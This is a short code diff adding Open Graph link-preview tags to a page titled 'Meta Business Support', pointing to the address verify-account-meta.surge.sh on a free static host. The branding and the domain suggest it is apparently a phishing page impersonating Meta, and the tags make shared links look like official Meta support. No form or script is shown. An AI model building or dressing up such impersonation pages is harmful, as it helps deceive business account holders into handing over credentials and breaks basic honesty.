--- a/sub-index.html
+++ b/sub-index.html
@@ -1,6 +1,10 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
+  <meta property="og:title" content="Meta Business Support" />
+<meta property="og:image" content="https://cdn.pixabay.com/photo/2021/12/14/22/29/meta-6871457_1280.png" />
+<meta property="og:url" content="https://verify-account-meta.surge.sh/" />
+<meta property="og:type" content="website" />
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Meta Business Support</title>
